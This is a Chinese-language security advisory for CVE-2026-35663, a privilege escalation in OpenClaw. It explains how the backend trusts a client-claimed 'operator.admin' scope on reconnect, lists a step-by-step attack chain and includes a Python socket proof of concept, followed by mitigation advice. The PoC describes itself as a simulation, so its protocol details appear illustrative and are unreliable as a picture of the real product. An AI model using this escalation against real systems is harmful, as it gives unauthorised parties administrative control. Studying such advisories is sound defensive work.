CVE-2026-35663 OpenClaw权限提升漏洞

漏洞信息

漏洞编号

CVE-2026-35663

漏洞类型

权限提升

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw在2026.3.25之前的版本中存在权限提升漏洞。非管理员操作员可在后端重连时自行请求更广泛的权限范围，从而绕过配对要求。攻击者能以operator.admin身份重连，获得未授权的管理员权限。该漏洞CVSS评分为8.8，属于高危漏洞。由于无需用户交互且攻击复杂度低，攻击者可轻易获取系统最高控制权，严重影响机密性、完整性和可用性。

技术细节

该漏洞的根本原因在于OpenClaw后端重连机制中未对客户端请求的权限范围（scope）实施严格的服务器端验证。在正常的业务逻辑中，操作员尝试重新建立连接时，应当通过严格的配对流程，且系统必须比对用户当前会话所允许的最大权限范围。然而，在受影响的版本中，开发人员错误地信任了客户端在重连握手阶段提交的scope参数，导致验证逻辑失效。攻击者仅需拥有一个普通操作员账户，便可在构造重连数据包时，将scope字段篡改为“operator.admin”。由于后端直接接收并应用了这一未经核实的请求，攻击者成功绕过了权限检查。这种“客户端自我声明”的漏洞模式严重破坏了系统的信任模型，使得攻击者能够轻易获取系统的最高管理权限，进而对整个系统进行完全控制。

攻击链分析

STEP 1

侦察与准备

攻击者识别目标OpenClaw系统，并获取一个低权限操作员账户的凭证。

STEP 2

建立初始连接

攻击者使用低权限账户连接到OpenClaw后端，完成基础认证。

STEP 3

构造恶意重连请求

攻击者利用后端重连接口，在请求包中将scope参数修改为operator.admin，尝试自我提升权限。

STEP 4

绕过验证

由于存在漏洞，后端未严格校验scope参数的合法性，直接接受了提升权限的请求。

STEP 5

获取管理员权限

攻击者成功以operator.admin身份重连，获得系统的完全管理控制权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import socket
import json

# Target OpenClaw backend server
TARGET_IP = "127.0.0.1"
TARGET_PORT = 8080

def exploit_openclaw_priv_esc():
    """
    PoC for CVE-2026-35663: OpenClaw Privilege Escalation via Backend Reconnect.
    This script simulates a low-privilege operator reconnecting with an escalated scope.
    """
    print(f"[*] Connecting to {TARGET_IP}:{TARGET_PORT}...")

    try:
        # Establish connection
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect((TARGET_IP, TARGET_PORT))

        # Step 1: Authenticate as a low-privilege operator (simulated token)
        auth_payload = {
            "action": "auth",
            "token": "valid_low_priv_token_here"
        }
        s.send(json.dumps(auth_payload).encode())
        print("[+] Authenticated as low-privilege operator.")

        # Step 2: Malicious reconnect request claiming admin scope
        # Vulnerability: The server accepts the scope claim without verification
        reconnect_payload = {
            "action": "reconnect",
            "requested_scope": "operator.admin"  # Escalation happens here
        }
        
        print("[*] Sending malicious reconnect request with scope 'operator.admin'...")
        s.send(json.dumps(reconnect_payload).encode())

        # Step 3: Receive response
        response = s.recv(1024)
        response_data = json.loads(response.decode())
        
        if "admin" in response_data.get("granted_scope", ""):
            print("[!] SUCCESS: Privilege escalation confirmed!")
            print(f"[*] Granted Scope: {response_data['granted_scope']}")
        else:
            print("[-] FAILED: Server did not grant admin scope.")

        s.close()

    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    exploit_openclaw_priv_esc()

影响范围

OpenClaw < 2026.3.25

防御指南

临时缓解措施

建议在升级补丁前，暂时禁用非管理员账户的后端重连功能，或在网络边界部署规则，拦截包含异常scope参数的重连请求，以降低被攻击风险。